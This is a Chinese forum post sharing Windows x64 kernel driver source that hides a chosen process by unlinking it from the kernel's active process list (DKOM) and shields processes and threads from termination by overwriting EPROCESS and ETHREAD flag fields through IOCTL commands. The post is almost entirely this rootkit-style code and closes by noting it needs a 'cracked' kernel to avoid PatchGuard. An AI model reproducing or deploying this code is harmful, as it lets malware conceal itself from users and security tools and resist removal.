- 注册时间
- 2010-8-21
- 最后登录
- 2017-5-30
- 在线时间
- 3 小时
编程入门
- 魔鬼币
- 515
|
实现隐藏进程和保护进程的手段依然是DKOM,不过是修改的位置不同而已。
至于怎么在64位操作系统上加载驱动,我已经说过了,请参考这里。
驱动使用WDK7的x64 Free Build Environment编译。
核心源码:
#define PROCESS_FLAGS_OFFSET 0x440
#define PROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x188
#define PROCESS_RUNDOWN_PROTECT_OFFSET 0x178
ULONG64 Get64bitValue(PVOID p)
{
if(MmIsAddressValid(p)==FALSE)
return 0;
return *(PULONG64)p;
}
VOID Set64bitValue(PVOID p, ULONG64 v)
{
KIRQL OldIrql;
if(MmIsAddressValid(p)==FALSE)
return ;
OldIrql = KeRaiseIrqlToDpcLevel();
*(PULONG64)p=v;
KeLowerIrql(OldIrql);
}
VOID RemoveListEntry(PLIST_ENTRY ListEntry)
{
KIRQL OldIrql;
OldIrql = KeRaiseIrqlToDpcLevel();
if (ListEntry->Flink != ListEntry &&
ListEntry->Blink != ListEntry &&
ListEntry->Blink->Flink == ListEntry &&
ListEntry->Flink->Blink == ListEntry)
{
ListEntry->Flink->Blink = ListEntry->Blink;
ListEntry->Blink->Flink = ListEntry->Flink;
ListEntry->Flink = ListEntry;
ListEntry->Blink = ListEntry;
}
KeLowerIrql(OldIrql);
}
VOID HideProcess(PEPROCESS Process)
{
RemoveListEntry((PLIST_ENTRY)((ULONG64)Process + PROCESS_ACTIVE_PROCESS_LINKS_OFFSET));
}
VOID Test(ULONG uIoControlCode)
{
switch(uIoControlCode)
{
case IOCTL_HideProcess:
{
__try
{
memcpy(&dwInputPid,pIoBuffer,sizeof(dwInputPid));
status=PsLookupProcessByProcessId(dwInputPid,&eProcess);
if(NT_SUCCESS(status))
{
HideProcess(eProcess);
}
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
;
}
break;
}
case IOCTL_ProtectProcess:
{
__try
{
memcpy(&dwInputPid,pIoBuffer,sizeof(dwInputPid));
status=PsLookupProcessByProcessId(dwInputPid,&eProcess);
if(NT_SUCCESS(status))
{
OldVal=Get64bitValue((PULONG64)((ULONG64)eProcess+PROCESS_RUNDOWN_PROTECT_OFFSET));
Set64bitValue((PULONG64)((ULONG64)eProcess+PROCESS_RUNDOWN_PROTECT_OFFSET),RdpVal);
}
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
;
}
break;
}
case IOCTL_UnprotectProcess:
{
__try
{
Set64bitValue((PULONG64)((ULONG64)eProcess+PROCESS_RUNDOWN_PROTECT_OFFSET),OldVal);
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
;
}
break;
}
}
}
更新内容:
#define PROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x188
#define PROCESS_FLAG2_OFFSET 0x43C
#define CROSS_THREAD_FLAGS_OFFSET 0x448
VOID Test(ULONG uIoControlCode)
{
switch(uIoControlCode)
{
case IOCTL_ProtectProcess:
{
__try
{
memcpy(&dwInPid,pIoBuffer,sizeof(dwInPid));
dprintf("[x64Drv] dwInPid=%ld",dwInPid);
status=PsLookupProcessByProcessId(dwInPid,&eProcess);
if(NT_SUCCESS(status))
{
dwPOV=Get64bitValue((PULONG64)((ULONG64)eProcess+PROCESS_FLAG2_OFFSET));
Set64bitValue((PULONG64)((ULONG64)eProcess+PROCESS_FLAG2_OFFSET),dwPNV);
dprintf("[x64Drv] Protect Process finished");
}
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
;
}
break;
}
case IOCTL_ProtectThread:
{
__try
{
memcpy(&dwInTid,pIoBuffer,sizeof(dwInTid));
dprintf("[x64Drv] dwInTid=%ld",dwInTid);
status=PsLookupThreadByThreadId(dwInTid,&eThread);
if(NT_SUCCESS(status))
{
dwTOV=Get32bitValue((PULONG64)((ULONG64)eThread+CROSS_THREAD_FLAGS_OFFSET));
Set32bitValue((PULONG64)((ULONG64)eThread+CROSS_THREAD_FLAGS_OFFSET),dwTNV);
dprintf("[x64Drv] Protect Thread finished");
}
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
;
}
break;
}
case IOCTL_UnprotectProcess:
{
__try
{
Set64bitValue((PULONG64)((ULONG64)eProcess+PROCESS_FLAG2_OFFSET),dwPOV);
Set32bitValue((PULONG64)((ULONG64)eThread+CROSS_THREAD_FLAGS_OFFSET),dwTOV);
dprintf("[x64Drv] Unprotect Process and Thread finished");
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
;
}
break;
}
case IOCTL_PauseThrdProtect:
{
__try
{
Set32bitValue((PULONG64)((ULONG64)eThread+CROSS_THREAD_FLAGS_OFFSET),dwTOV);
dprintf("[x64Drv] Thread Protect Suspended!");
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
;
}
break;
}
case IOCTL_ResumeThrdProtect:
{
__try
{
Set32bitValue((PULONG64)((ULONG64)eThread+CROSS_THREAD_FLAGS_OFFSET),dwTNV);
dprintf("[x64Drv] Thread Protect Resumed!");
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
;
}
break;
}
}
}
警告:此代码在没有破解内核的WIN7 X64上使用,会触发PatchGuard引起蓝屏。
Warning: If you use this code in WIN7 X64 without "crack kernel", it will trigger PatchGuard and cause BSOD.
|
|
发表于 2017-5-30 09:12:10